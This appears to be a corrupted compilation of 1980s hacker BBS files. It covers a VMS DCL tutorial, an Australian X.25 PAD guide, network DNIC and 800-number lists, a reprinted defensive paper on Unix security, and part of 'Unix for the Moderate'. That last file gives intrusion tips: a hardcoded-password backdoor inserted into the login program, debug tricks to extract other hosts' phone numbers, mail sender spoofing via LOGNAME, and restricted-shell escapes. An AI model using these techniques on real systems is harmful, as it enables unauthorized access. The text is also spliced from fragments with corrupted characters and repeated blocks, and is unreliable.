PAD 15 = 0 The current line of text in the buffer (i.e the part-packet waiting to be sent) cannot be edited. 16 = 127) 17 = 24 ) These three edit control parameters are not applicable when param 2l-us than or equal to the second .LT. Sees if the first number is less than the second .NE. Sees if two numbers are not equal .AND. Combines two numbers with a AND .OR. Combines two numbers with a OR When a expression has more than one number, the numbers are connected by mathimatical commands. The preceding chart lists the Mathimatical commands. You can override the normal flow by using parentheses. Ex: $ RESULT = 4 * (6 + 2) $ SHOW SYMBOL3A RESULT RESULT = 32 Hex = 0Xz Q1= 000000000040 The ampersand (&) can be used for symbol substitution. The difference between the apostrophe (') and the ampersand (&) is the time when subsistution takes place. Symbols before apostrophes are substituted during the first fase of the command; Symbols before a ampersands are subistituted during the seccond fase. Ex: $ TYPE 'FILENAME' $ TYPE &FILENAME Peace Sells... But Who's BA uying? Master Blaster (313) (H)ackRite 1986, Advanced Telecommunications Inc... Shadow Spawn BBS 219-659-1503 ----------------------------------------------------------------- Peace Sells... But Who's Buying? Master Blaster (313) (H)ackRite 1986, Advanced Telecommunications Inc... Shadow Spawn BBS 219-659-1503 -------------------------------------ng parentheses. Ex: $ RESULT = 4 * (6 + 2) $ SHOW SYMBOL5C an update only, so if you haven't got the midas files 1 and 2 then it might be an idea to get these files as well. The Buzzard 1. New User Friendly OTC Data Access Easier Access : (02)20991 if your application is general interactive database access. (02)20992 if you will be using special file transfer protocols, or other protocols, which require PAD transparency. Baud Rates : 300, 1200/75, 1200/1200, 2400 baud 7 bit6~s, 1 stop, EVEN parity FULL duplex, XON/XOFF control flow Upon dial up connection OTC Data Access will generate a welcome banner,followed by the '*' (asterisk) prompt. The '*' means that the PAD is waiting for your command. Commands -------- The Commands are much the same as described in the Midas Files.. At the prompt '*', and in a single line without spaces, type in upper or lower case a.the character 'N' b.your NUI (password) this wont be echoed to the screen c.the7F1 hyphen character '-' d.A zero '0' (only for international calls with full address) e.the full address to be called, or the abbreviated address f. a carriage return Successful Calls ---------------- Successful connection of your call will be confirmedby the following message from the OTC Data Access PAD:- date and time - 24 hour format Sydney Time CID XXXX - Call Identification number Host Address - confirmation of the called address 'COM' - Indicates that you 8may now communicate with the called host. Unsuccessful Calls ------------------ If your call was not successful, you will recieve a 'clearing indication' from the OTC Data Access PAD of the form: CLR nnn The code will indicate why the call failed. Special Protocols ----------------- If your going to use a spacial file transfer protocol i.e. X-MODEM, or other block mode protocols, then you will have to set the Data Access PAD to be totally transparent. Transparency can9Y only be achieved thru the (02)20992 number. a. dial (02)20992 b. call your host computer c. some hosts can set the PAD to transparency, automatically. If your host can't do that, or your not sure, the you shouls set the PAD manually as follows : d. BEFORE commencing your file transfer or BEFORE entering block mode, type P to swap the PAD from data mode to cammand mode. e. at the '*' prompt type the command PROF1 to select the transparent PAD Profile:$, profile 1. f. the PAD is now completely transparent to your data. It is also completely silent and cannot be recalled for you to issue further PAD commands. You may now proceed with your data transfers. g. When you logoff from your host and the call is cleared, the PAD will return to its default profile, profile 4. Commands -------- General PAD Commands which can be issued at the '*' (asterisk) prompt : PAD COMMAND FUNCTION INDICATORS --;-------------------------------------------------------------------------- CLR to break the existing connection CLR CONF RESET to reset the logical connection none from Data and dump all packets in transit Access. Your host may send a reset indicator. INT to interrupt the host. An usually none. alternate to the BREAK key. ST &/ڦAT used to check if logical FREE or ENGAGED connection active. --------------------------------------------------------------------------- Profile change command (at the '*' prompt) PAD COMMAND FUNCTION INDICATORS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PROFn set all parameters to values (nil) specified in Profile n. -=-=-==8PHILCOM - PORTUGAL TELEPAC 2680 PORTUGAL SABD 2682 PUERTO RICO UDTC 3301 REUNION DOMPAC 6470 SINGAPORE TELEPAC 5252 SOUTH AFRICA SAPONET 6550 SOUTH KOREA DACOM-NET 4501 SPAIN TIDA 2141 SPAIN IBERPAC 2145 SWEDEN DATAPAK 2402 SWEDEN TELEPAK 2405 SWITZERLAND TELEPAC 2284 SWI>xTZERLAND RADIO SUISSE 2289 TAIWAN UDAS 4877 TAIWAN PACNET 4872 THAILAND IDARC 5200 TRINIDAD DATANET-1 3740 TRINIDAD TEXDAT 3745 UN.ARAB EMIRTS. EMDAN - UK PSS 2342 UK IPSS 2341 USA ACCUNET 3134 USA AUTONET 3126 USA COMPUSERVE 3132 USA DATA TRANSPORT ?YD 3102 USA FTCC 3124 USA MARKNET 3136 USA MCII-IMPACS 3104 USA RCA-LSDS 3113 USA ITT-UDTS 3103 USA TELENET 3110/3125 USA TRT-DATAPAK 3119 USA TYMNET 3106 USA WUTCO 3101 ------------------------------------------------------------------------------ - If anyone could help me fill in some of the blanks, I  a~`would appreciate it. - - Catch Ya Later - - ----====} THE FORCE {====---- - ------------------------------------------------------------------------------ END ENDiate it. - - Catch Ya Later - - ----====} THE FORCE {====---- - --------------------------------- DATA TRANSPORTA8 / \ | Vax/Vms | | Part 2 | | | | By | | Master Blaster | \_____________________________/ Advanced Telecommunications Inc. You can either use the ASSIGN or DEFINE command to create a name. The following command creates the name WORKFILE.B7y DISK2:[WALSH.REPORTS]WORK_SUMMARY.DAT: $ Define Workfile Disk2:[Walsh.Reports]Work_Summary.Dat To delete a name, use the DEASSIGN command. For example, if you don't want the name WORKFILE you can delete it with the following command: $ Deassign Workfile You Can use the names to refer you to your files and work directories. For example if you create the name COMS to switch to directory name DISK7:[WALSH.COMMAND_PROC], you can use the name COMS instead of typing the CZ7long device and directory names. The following shows how to define the name COMS and use it as part of a file specification. $ Define Coms Disk7:[Walsh.Command_proc] $ Type Coms:payroll.Com $ Set Default Coms Use the SHOW LOGICAL command to display logical names. The SHOW LOGICAL command looks for certian names that you specify. The following command displays the equivalence string got the logical name INTRO. $ SHOW LOGICAL INTRO O "INTRO" [super] = "Disk6:[SMITH.INTRD=jO]" (LNM$PROGRESS_TABLE) A list search list names that have more that one of the same on the system. $ DEFINE MY_FILES DISK1:[SMITH], DISK2:[SMITH] When you use a search list, the system reads the search list using each string in the definition. $ TYPE MY_FILES:CHAP1.RNO When the system is booted a set of logical-names are created and put in the logical name table, (LNM$SYSTEM). These names let you look to often used files or divices without rembering thEere actual names. If you wanted a list of programs you don't need to know the name of the disk and directory where these programs are. You can just use the name SYS$SYSTEM: $ DIRECTORY SYS$SYSTEM When you use a character string in a expression you must put quotes around it. If you want quotes to show around an expression put double qutes around it. Ex: $ PROMPT = "Type ""YES"" or ""NO""" $ SHOW SYMBOL PROMPT PROMPT = "Type "YES" or "NO"" If you use a sF4"ymbol in a exspression, the symbol's value is subistuted for the symbol. Ex: $ COUNT = 3 $ TOTAL = COUNT + 1 $ SHOW SYMBOL TOTAL TOTAL = 4 Hex = 00000004 Octal = 00000000004 Mathimatical Commands Command Description ------- ----------- + Positive Number - Negitive Number * Multiplies / Divides + Adds - Subtracts .EQS. Sees if two strings are the equal .GES. Sees if the first string is bigger than the other or 1[_ the same as the second .GTS. Sees if the first string is bigger than the second .LES. Sees if the first string is less than or equal to the second .LTS. Sees if the first string is less than the second .NES. Sees if two strings are not equal .EQ. Sees if two numbers are equal .EG. Sees if the first number is greater than the second .GT. Sees if the first number is greater than the second .LE. Sees if the first number is les:luck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs, Government System Division, USA (August 1987) =============================================================================== homas, R "Securing your terminal: two approaches" Unix/World (April 1986) pp 73-76 11 Karpinski, D "Security round table (Part 1)" Unix Review (October 1984) p 48 12 Karpinski, D "Security round table (PaIMOF EDUCATION NEWS 800-424-9090 WHITE HOUSE PRESS OFC 800-424-8530 HOUSING & URBAN DEVLPMT 800-424-8807 TRANSPORTATION NEWSLINE 800-424-0214 OFC OF EDUCATION NEWS 800-424-9090 WHITE HOUSE PRESS OFC 800-621-8094 AMERICAN MED ASSN 800-368-5744 AFL-CIO NEWS SVC 800-424-8086 NATL EDUCATION ASSN 800-238-5342 NATIONAL COTTON COUNCIL 800-424-9820 CITIZENS CHOICE NEWS 800-252-0112 USC NEWSLINE 800-368-5667 BUSINESS LINE 800-368-5844 COMM SATELITE CORP STOCK REPORT 800-368-5500 Ct{ OIN UPDATE IST OF MANY NUMBERS 512-472-4263 WIERD 512-472-9941 "INSERT .25" 203-771-3930 PIONEERS 213-254-4914SMOG REPORT SAN BERNDNO 800-622-0858 CALIF MED ASSN 800-525-7623 AM EXPRESS CURR EXCH RT 800-424-2424 AM FED OF TEACHERS 800-525-3056 CATTLEMAN NEWS 800-525-3085 CATTLEMAN NEWS 800-424-9864 EDISON ENERGY LINE 800-424-9128 DEPT OF ENERGY NEWSLINE 800-424-9129 IN SPANISH 800-424-8530 HOUSING & URBAN DEVLPMT 800-424-8807 TRANSPORTATION NEWSLINE 800-424-0214 OFC Kl+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ COUNTRY NETWORK DNIC COUNTRY NETWORK DNIC ---------------------------------------------------------------------------- ARGENTINA - 7220 AUSTRALIA MIDAS 5053 AUSTRALIA AUSTPAC 5052 AUSTRIA RADIO AUSTRIA 2329 AUSTRIA DATEX-P 2322 BAHAMAS IDAS Lf 3406 BAHRAIN BAHNET 4263 BARBADOS IDAS 3423 BELGIUM DCS 2062 BELGIUM - 2068 BELGIUM - 2069 BERMUDA BERMUDANET 3503 BRAZIL INTERDATA 7240 CANADA GLOBEDAT 3025 CANADA INFOSWITCH 3029 CANADA DATAPAC 3020 CAYMAN ISLANDS - 3463 CHILE - 7300 COLUMBIA M#N DAPAQ-INTER. 3107 COTE D IVOIRE SYTRANPAC 6122 DENMARK DATAPAK 2382 EGYPT ARENTO - FINLAND FINPAK 2442 FRANCE TRANSPAC 2080 FRANCE NTI 2081 FRENCH ANTILLES DOMPAC 3400 FRENCH GUIANA DOMPAC 7420 FRENCH POLYNESIA TOMPAC 5470 GABON GABONPAC 6282 GERMANY(FED REP) DATEX-P 2624 GERMANY(FED REP) DATEX-P INT 2624 NQ GREECE HELPAC 2022 GUATEMALA GUATEL - HONDURAS - - HONG KONG DATAPAK 4545 HONG KONG IDAS 4542 ICELAND ICEPAC 2740 INDONESIA SKDP 5101 IRISH REP EIRPAC 2724 ISRAEL ISRANET 4251 ITALY ITALCABLE 2227 ITALY ITAPAC 2222 JAPAN VENUS-P 4408 JAPAN DDX-P /dev/0T3tty We see that the password of the root user is mailed to the hacker who has completely compromised the Unix system. The fake terminal-login acts as if the user has incorrectly entered the password. It then transfers control over to the stty process, thereby leaving no trace of its existence. Prevention of spoofs, like most security hazards, must begin with user education. But an immediate solution to security is sometimes needed before education can be effected. As for terminal-l1U[ogin spoofs, there are some keyboard-locking programs that protect the login session while users are away from their terminals. (8, 10) These locked programs ignore keyboard-generated interrupts and wait for the user to enter a password to resume the terminal session. Since the suid mode has been previously examined in the password section, we merely indicate some suid solutions here. First, suid programs should be used is there are no other alternatives. Unrestrained suids or sgid2VTQ|s can lead to system compromise. Second, a "restricted shell" should be given to a process that escapes from a suid process to a child process. The reason for this is that a nonprivileged child process might inherit privileged files from its parents. Finally, suid files should be writable only by their owners, otherwise others may have access to overwrite the file contents. It can be seen that by applying some basic security principles, a user can avoid Trojan horses, spoofs and in3Wì]appropriate suids. There are several other techniques used by hackers to compromise system security, but the use of good judgement and user education may go far in preventing their occurence. CONCLUSION Throughout this paper we have discussed conventional approaches to Unix system security by way of practical file management, password protection, and networking. While it can be argued that user eduction is paramount in maintaining Unix system security (11) factors in human error will4XIx( promote some degree of system insecurity. Advances in protection mechanisms through better-written software (12), centralized password control (13) and identification devices may result in enhanced Unix system security. The question now asked applies to the future of Unix system operating. Can existing Unix systems accommodate the security requirements of government and industry? It appears not, at least for governmental security projects. By following the Orange Book (14), a gove5YݽH~rnment graded classification of secure computer systems, the Unix system is only as secure as the C1 criterion. A C1 system, which has a low security rating (D being the lowest) provides only discretionary security protection (DSP) against browsers or non-programmer users. Clearly this is insufficient as far as defense or proprietary security is concerned. What is needed are fundamental changes to the Unix security system. This has been recognized by at least three companies, AT&T, G6Z:ould and Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the kernel and file system in order to produce a C2 rated Unix operating system. To achieve this, however, they have had to sacrifice some of the portability of the Unix system. It is hoped that in the near future a Unix system with an A1 classification will be realized, though not at the expense of losing its valued portability. REFERENCES 1 Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 7[8 (1986) pp 50-63 2 Waite, M et al. "Unix system V primer" USA (1984) 3 Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128 4 Kowack, G and Healy, D "Can the holes be plugged?" Computerworld Vol 18 (26 September 1984) pp 27-28 5 Farrow, R "Security issues and strategies for users" Unix/World (April 1986) pp 65-71 6 Farrow, R "Security for superusers, or how to break the Unix system" Unix/World (May 1986) pp 65-70 7 Grampp, F T and Morris, R H 8\X"Unix operating system security" AT&T Bell Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672 8 Wood, P H and Kochan, S G "Unix system security" USA (1985) 9 Nowitz, D A "UUCP Implementation description: Unix programmer's manual Sec. 2" AT&T Bell Laboratories, USA (1984) 10 Thomas, R "Securing your terminal: two approaches" Unix/World (April 1986) pp 73-76 11 Karpinski, D "Security round table (Part 1)" Unix Review (October 1984) p 48 12 Karpinski, D "Security round table (Pa9Ggrt 2)" Unix Review (October 1984) p 48 13 Lobel, J "Foiling the system breakers: computer security and access control" McGraw-Hill, USA (1986) 14 National Computer Security Center "Department of Defense trusted computer system evaluation criteria" CSC-STD-001-83, USA (1983) 15 Stewart, F "Implementing security under Unix" Systems&Software (February 1986) 16 Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix for the Lock TCB" Proceedings of USENIX (1988) 17 Ch$^_dto consider when looking into network security with the Unix system. The first is uucp, a command used to copy files between two Unix systems. If uucp is not properly implemented by the system administrator, any outside user can execute remote commands and copy files from another login user. If the file name on another system is known, one could use the uucp command to copy files from that system to their system. For example: %uucp system2!/main/src/hisfile myfile will copy hisfile%_j from system2 in the directory /main/src to the file myfile in the current local directory. If file transfer restrictions exist on either system, hisfile would not be sent. If there are no restrictions, any file could be copied from a remote user - including the password file. The following would copy the remote system /etc/passwd file to the local file thanks: %uucp system2!/etc/passwd thanks System administrators can address the uucp matter by restricting uucp file transfers to t&`$1he directory /user/spool/uucppublic. (8) If one tries to transfer a file anywhere else, a message will be returned saying "remote access to path/file denied" and no file transfer will occur. The second UUCP system command to consider is the uux. Its function is to execute commands on remote Unix computers. This is called remote command execution and is most often used to send mail between systems (mail executes the uux command internally). The ability to execute a command on anot'am^her system introduces a serious security problem if remote command execution is not limited. As an example, a system should not allow users from another system to perform the following: %uux "system1!cat/usr/spool/uucppublic" which would cause system1 to send its /etc/passwd file to the system2 uucp public directory. The user of system2 would now have access to the password file. Therefore, only a few commands should be allowed to execute remotely. Often the only comma(bf@nd allowed to run uux is rmail, the restricted mail program. The third UUCP system function is the uucico (copy in / copy out) program. It performs the true communication work. Uucp or uux does not actually call up other systems; instead they are queued and the uucico program initiates the remote processes. The uucico program uses the file /usr/uucp/USERFILE to determine what files a remote system may send or receive. Checks for legal files are the basis for security in USERFILE. T)c20hus the system administrator should carefully control this file. In addition, USERFILE controls security between two Unix systems by allowing a call-back flag to be set. Therefore, some degree of security can be achieved by requiring a system to check if the remote system is legal before a call-back occurs. The last UUCP function is the uuxqt. It controls the remote command execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine which commands will run in resp*dr{onse to a remote execution request. For example, if one wishes to use the electronic mail feature, then the L.cmd file will contain the line rmail. Since uuxqt determines what commands will be allowed to execute remotely, commands which may compromise system security should not be included in L.cmd. CALL THE UNIX SYSTEM In addition to UUCP network commands, one should also be cautious of the cu command (call the Unix system). Cu permits a remote user to call another computer system. +e+ /The problem with cu is that a user on a system with a weak security can use cu to connect to a more secure system and then install a Trojan horse on the stronger system. It is apparent that cu should not be used to go from a weaker system to a stronger one, and it is up to the system administrator to ensure that this never occurs. LOCAL AREA NETWORKS With the increased number of computers operating under the Unix system, some consideration must be given to local area networks (LANs).,f' Because LANs are designed to transmit files between computers quickly, security has not been a priority with many LANs, but there are secure LANs under development. It is the job of the system manager to investigate security risks when employing LANs. OTHER AREAS OF COMPROMISE There are numerous methods used by hackers to gain entry into computer systems. In the Unix system, Trojan horses, spoofs and suids are the primary weapons used by trespassers. Trojan horses are pieces of co-g'3de or shell scripts which usually assume the role of a common utility but when activated by an unsuspecting user performs some unexpected task for the trespasser. Among the many different Trojan horses, it is the su masquerade that is the most dangerous to the Unix system. Recall that the /etc/passwd file is readable to others, and also contains information about all users - even root users. Consider what a hacker could do if he were able to read this file and locate a root user wi.Rth a writable directory. He might easily plant a fake su that would send the root password back to the hacker. A Trojan horse similar to this can often be avoided when various security measures are followed, that is, an etc/passwd file with limited read acces, controlling writable directories, and the PATH variable properly set. A spoof is basically a hoax that causes an unsuspecting victim to believe that a masquerading computer funtion is actually a real system operation. A very i(uction that imparts access privileges to a perpetrator. The fake cat is placed in a public directory /usr/his where a user often works. Now if the user has a PATH variable with the current directory first, and he enters the cat command while in /usr/his, the fake cat in /usr/his would be executed but not the system cat located in /bin. In order to prevent this kind of system violation, the PATH variable must be correctly set. First, if at all possible, exclude the current directoryj)| as the first entry in the PATH variable and type the full path name when invoking Unix system commands. This enhances file security, but is more cumbersome to work with. Second, if the working directory must be included in the PATH variable, then it should always be listed last. In this way, utilities like vi, cat, su and ls will be executed first from systems directories like /bin and /usr/bin before searching the user's working directory. PASSWORD SECURITY User authentication in tk3he Unix system is accomplished by personal passwords. Though passwords offer an additional level of security beyond physical constraints, they lend themselves to the greatest area of computer system compromise. Lack of user awareness and responsibility contributes largely to this form of computer insecurity. This is true of many computer facilities where password identification, authentication and authorization are required for the access of resources - and the Unix operating system lUis no exception. Password information in many time-sharing systems are kept in restricted files that are not ordinarily readable by users. The Unix system differs in this respect, since it allows all users to have read access to the /etc/passwd file (FIGURE 2) where encrypted passwords and other user information are stored. Although the Unix system implements a one-way encryption method, and in most systems a modified version of the data encryption standard (DES), password breakingmf methods are known. Among these methods, brute-force attacks are generally the least effective, yet techniques involving the use of heuristics (good guesses and knowledge about passwords) tend to be successful. For example, the /etc/passwd file contains such useful information as the login name and comments fields. Login names are especially rewarding to the "password breaker" since many users will use login variants for passwords (backward spelling, the appending of a single digit en}atc.). The comment field often contains items such as surname, given name, address, telephone number, project name and so on. To quote Morris and Grampp (7) in their landmark paper on Unix system security: [in the case of logins] The authors made a survey of several dozen local machines, using as trial passwords a collection of the 20 most common female first names, each followed by a single digit. The total number of passwords tried was, therefore, 200. At least one of thesoe 200 passwords turned out to be a valid password on every machine surveyed. [as for comment fields] (...) if an intruder knows something about the people using a machine, a whole new set of candidates is available. Family and friend's names, auto registration numbers, hobbies, and pets are particularly productive categories to try interactively in the unlikely event that a purely mechanical scan of the password file turns out to be disappointing. Thus, given a persis ptent system violator, there is a strong evidence, that he will find some information about users in the /etc/passwd file. With this in mind, it is obvious that a password file should be unreadable to everyone except those in charge of system administration. root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms. Resolution of the /etc/passwd file's readability do!q%es not entirely solve the basic problem with passwords. Educating users and administrators is necessary to assure proper password utilization. First, "good passwords are those that are at least six characters long, aren't based on personal information, and have some nonalphabetic (especially control) characters in them: 4score, my_name, luv2run" (8). Secondly, passwords should be changed periodically but users should avoid alternating between two passwords. Different passwords for di"r)fferent machines and files will aid in protecting sensitive information. Finally, passwords should never be available to unauthorized users. Reduction of user ignorance about poor password choice will inevitably make a system more secure. NETWORK SECURITY UUCP system The most common Unix system network is the UUCP system, which is a group of programs that perform the file tranfers and command execution between remote systems. (3) The problem with the UUCP system is that users on the #]6network may access other users' files without access permission. As stated by Nowitz (9), The uucp system, left unrestricted, will let any outside user execute commands and copy in/out any file that is readable/writable by a uucp login user. It is up to the individual sites to be aware of this, and apply the protections that they feel free are necessary. This emphasizes the importance of proper implementation by the system administrator. There are four UUCP system commands toO5s as umask and chmod, users can enhance file system security. The Unix system, however, restricts the security defined by the user to only owner, group and others. Thus, the owner of the file cannot designate file access to specific users. As Kowack and Healy have pointed out, "The granularity of control that (file security) mechanisms is often insufficient in practice (...) it is not possible to grant one user write protection to a directory while granting another read permission toulD the same directory. (4) A useful file security file security extension to the Unix system might be Multics style access control lists. With access mode vulnerabilities in mind, users should pay close attention to files and directories under their control, and correct permissions whenever possible. Even with the design limitations in mode ranularity, following a safe approach will ensure a more secure Unix system file structure. SUID and SGID The set user id (suid) and set group idv/Z (sgid) identify the user and group ownership of a file. By setting the suid or sgid permission bits of an executable file, other users can gain acces to the same resources (via the executable file) as that of the real file's owner. For Example: Let Bob's program bob.x be an executable file accessible to others. When Mary executes bob.x, Mary becomes the new program owner. If during program execution bob.x requests access to file browse.txt, then Mary must have previous read or writew )A permission to browse.txt. This would allow Mary and everyone else total access to the contents of browse.txt, even when she is not running bob.x. By turning on the suid bit of bob.x, Mary will have the same access permissions to browse.txt as does the program's real owner, but she will only have access to browse.txt during the execution of bob.x. Hence, by incorperating suid or sgid, unwelcome browsers will be prevented form accessing files like browse.txt Although this feature apxlpears to offer substantial access control to Unix system files, it does have one critical drawback. There is always the chance that the superuser (system administrator) may have a writable file for others that is also set with suid. With some modification in the file's code (by a hacker), an executable file like this would enable a user to become a superuser. Within a short period of time this violator could completely compromise system security and make it inaccessible, even to othey<r superusers. As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by root is better than knowing the root password". To compensate for this security threat, writable suid files should be sought out and eliminated by the system administrator. Reporting of such files by normal users is also essential in correcting existing security breaches. DIRECTORIES Directory protection is commonly overlooked component of file security in the Unix system. Many system adminizu#bstrators and users are unaware of the fact, that "publicly writable directories provide the most opportunities for compromising the Unix system security" (6). Administrators tend to make these "open" for users to move around and access public files and utilities. This can be disastrous, since files and other subdirectories within writable directories can be moved out and replaced with different versions, even if contained files are unreadable or unwritable to others. When this happen{!Ss, an unscrupulous user or a "password breaker" may supplant a Trojan horse of a commonly used system utility (e.g. ls, su, mail and so on). For example, imagine For example: Imagine that the /bin directory is publicly writable. The perpetrator could first remove the old su version (with rm utility) and then include his own fake su to read the password of users who execute this utility. Although writable directories can destroy system integrity, readable ones can be just as damagin|_g. Sometimes files and directories are configured to permit read access by other. This subtle convenience can lead to unauthorized disclosure of sensitive data: a serious matter when valuable information is lost to a business competitor. As a general rule, therefore, read and write access should be removed from all but system administrative directories. Execute permission will allow access to needed files; however, users might explicitly name the file they wish to use. This adds so}; me protection to unreadable and unwritable directories. So, programs like lp file.x in an unreadable directory /ddr will print the contents of file.x, while ls/ddr would not list the contents of that directory. PATH VARIABLE PATH is an environment variable that points to a list of directories, which are searched when a file is requested by a process. The order of that search is indicated by the sequence of the listed directories in the PATH name. This variable is established at user h.Plogon and is set up in the users .profile of .login file. If a user places the current directory as the first entry in PATH, then programs in the current directory will be run first. Programs in other directories with the same name will be ignored. Although file and directory access is made easier with a PATH variable set up this way, it may expose the user to pre-existing Trojan horses. To illustrate this, assume that a trojan horse, similar to the cat utility, contains an instrtg |\| |\| Magical Hassan <- Special Thanx to: -> Forth Protocol |/| [/]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[\] [ Source: The Archives of Magical Hassan - Usr#276 Devil's Playground BBS ] ==Phrack Inc.== Volume Two, Issue 18, Phile #7 of 7 +--------------------------------------+ | "RvUnix System Security Issues" | | Typed by: | | Whisky | | (from Holland, Europe) | +--------------------------------------+ | From | | Information Age | | Vol. 11, Number 2, April 1988 | | Written QLYHBy: | | Michael J. Knox and Edward D. Bowden | +--------------------------------------+ Note: This file was sent to me from a friend in Holland. I felt that it would be a good idea to present this file to the UNIX-hacker community, to show that hackers don't always harm systems, but sometimes look for ways to secure flaws in existing systems. -- Jester Sluggo !! There are a number of elements that have leadP\ to the popularity of the Unix operating system in the world today. The most notable factors are its portability among hardware platforms and the interactive programming environment that it offers to users. In fact, these elements have had much to do with the succesful evolution of the Unix system in the commercial market place. (1, 2) As the Unix system expands further into industry and government, the need to handle Unix system security will no doubt become imperative. For example, the US government is committing several millon dollars a year for the Unix system and its supported hardware. (1) The security requirements for the government are tremendous, and one can only guess at the future needs of security in industry. In this paper, we will cover some of the more fundamental security risks in the Unix system. Discussed are common causes of Unix system compromise in such areas as file protecion, password security, networking and hacker violations. In our ?8conclusion, we will comment upon ongoing effects in Unix system security, and their direct influence on the portability of the Unix operating system. FILE AND DIRECTORY SECURITY In the Unix operating system environment, files and directories are organized in a tree structure with specific access modes. The setting of these modes, through permission bits (as octal digits), is the basis of Unix system security. Permission bits determine how users can access files and the type of access ǩ,y they are allowed. There are three user access modes for all Unix system files and directories: the owner, the group, and others. Access to read, write and execute within each of the usertypes is also controlled by permission bits (Figure 1). Flexibility in file security is convenient, but it has been criticized as an area of system security compromise. Permission modes OWNER GROUP OTHERS ------------------------------ zg------------------------------ rwx : rwx : rwx ------------------------------------------------------------ r=read w=write x=execute -rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file drwx------ 2 sam A1 2 May 01 12:01 directory FIGURE 1. File and directory modes: File shows Bob as the owner, with read and write permission. Group has write permission, while Others has read and execute permission. The directory gives a secure directory not readab lle, writeable, or executable by Group and Others. Since the file protection mechanism is so important in the Unix operating system, it stands to reason that the proper setting of permission bits is required for overall security. Aside from user ignorance, the most common area of file compromise has to do with the default setting of permission bits at file creation. In some systems the default is octal 644, meaning that only the file owner can write and read to a file, while all oth ers can only read it. (3) In many "open" environments this may be acceptable. However, in cases where sensitive data is present, the access for reading by others should be turned off. The file utility umask does in fact satisfy this requirement. A suggested setting, umask 027, would enable all permission for the file owner, disable write permission to the group, and disable permissions for all others (octal 750). By inserting this umask command in a user .profile or .login file, the  sXTdefault will be overritten by the new settings at file creation. The CHMOD utility can be used to modify permission settings on files and directories. Issuing the following command, chmod u+rwd,g+rw,g-w,u-rwx file will provide the file with the same protection as the umask above (octal 750). Permission bits can be relaxed with chmod at a later time, but at least initially, the file structure can be made secure using a restrictive umask. By responsible application of such utilitieyone is passing another systems passwds about. You may want to add another entry to the passwd file, but that's relatively dangerous to the life of your machine. Be sure not to have anything out of the ordinary as the entry (i.e., No uid 0). Get a copy of the login program (Available at your nearest decent BBS, I hope) of that same version of unix, and modify it a bit: on system 5, here's a modification pretty common: in the routine to check correct passwds, ou3n the line before the actual pw check, put a if (!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling you to log on as any valid user that isn't uid 0 (On system 5). Neato things: -Have you ever been on a system that you couldn't get root or read the Systems/L.sys file? Well, this is a cheap way to overcome it: 'uuname' will list all machines reachable by your unix, then (Assuming they aren't Direct, and the modem is available): $ cu1 -d host.you.want [or] $ uucico -x99 -r1 -shost.you.want Both will do about the same for us. This will fill your screen with lots of trivial material, but will eventually get to the point of printing the phone number to the other system. -d enables the cu diagnostics, -x99 enables the uucico highest debug, and -R1 says 'uucp master'. Back a year or two, almost everywhere had their uucp passwd set to the same thing as their nuucp passwd (Thanksa; to the Systems file), so it was a breeze getting in. Even nowadays, some places do it.. You never can tell. -Uucp: I personally don't like the uucp things. Uucico and uux are limited by the Permissions file, and in most cases, that means you can't do anything except get & take from the uucppublic dirs. Then again, if the permission/L.cmd is blank, you should be able to take what files that you want. I still don't like it. -Sending mail: Sometimes, the m$ail program checks only the shell var LOGNAME, so change it, export it, and you may be able to send mail as anyone. (Mainly early system 5's.) $ LOGNAME="root";export LOGNAME -Printing out all the files on the system: Useful if you're interested in the filenames. $ find / -print >file_list& And then do a 'grep text file_list' to find any files with 'text' in their names. Like grep [.]c file_list, grep host file_list.... -Printing out all restricṫed files: Useful when you have root. As a normal user, do: $ find / -print >/dev/null& This prints out all nonaccessable directories, so become root and see what they are hiding. -Printing out all the files in a directory: Better looking than ls -R: $ find . -print It starts at the present dir, and goes all the way down. Catches all '.files', too. -Rsh: Well in the case of having an account with rsh only, check your 'set'. If SHELL is not /[bin/sh, and you are able to run anything with a shell escape (ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'. If you have write permission on your .profile, change it, because rsh is ran after checking profile. -Humor: On a system 5, do a: $ cat "food in cans" or on a csh, do: % hey unix, got a match? Well, i didn't say it was great. Password hacking: -Salt: In a standard /etc/passwd file, passwords are 13 characte`8rs long. This is a 11 char encrypted passwd and a 2 char encryption modifier (salt), which is used to change the des algorithym in one of 4096 ways. Which means there is no decent way to go and reverse hack it. Yet. On normal system 5 unix, passwords are supposed to be 6-8 characters long and have both numeric and alphabetic characters in them. Which makes a dictionary hacker pretty worthless. However: if a user keeps insisting his password is going to be 'Fdog', usually the system will comply (Depending on version). I have yet to try it, but having the hacker try the normal entry, and then the entry terminated by [0-9] is said to have remarkable results, if you don't mind the 10-fold increase in time. Final notes: Yes, I have left a lot out. That seems to be the rage nowadays.. If you have noticed something wrong, or didn't like this, feel free to tell me. If you can find me. ---------------------------------------3.n---------------------------------------- Hi Ho. Here ends part one. ------------------------------------------------------------------------------- Produced and directed by: Urvile & Necron 99 ----------------------------------------------------------- (c) ToK inc., 1988 =============================================================================== ty worthless. However: if a user keeps insisting his password is going to be '~ ] [ DP ] |\| [\]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[/] |/| D Call and Support: F |\| |\| I The Devil's Playground BBS A |/| |/| A (03) 338-4687 - 300/1200/2400/9600 S |\| |\| L Call Today Don't Delay! T |/| |/| K Unix for the Moderate ------------------------------------------------------------------------------- By: The Urvile, Necron 99, and a host of me. ------------------------------------------------------------------------------- Disclaimer: This is mainly for system five. I do reference bsd occasionally, but I mark those. All those little weird brands (i.e., DEC's ultrix, xenix, and so on) can go to 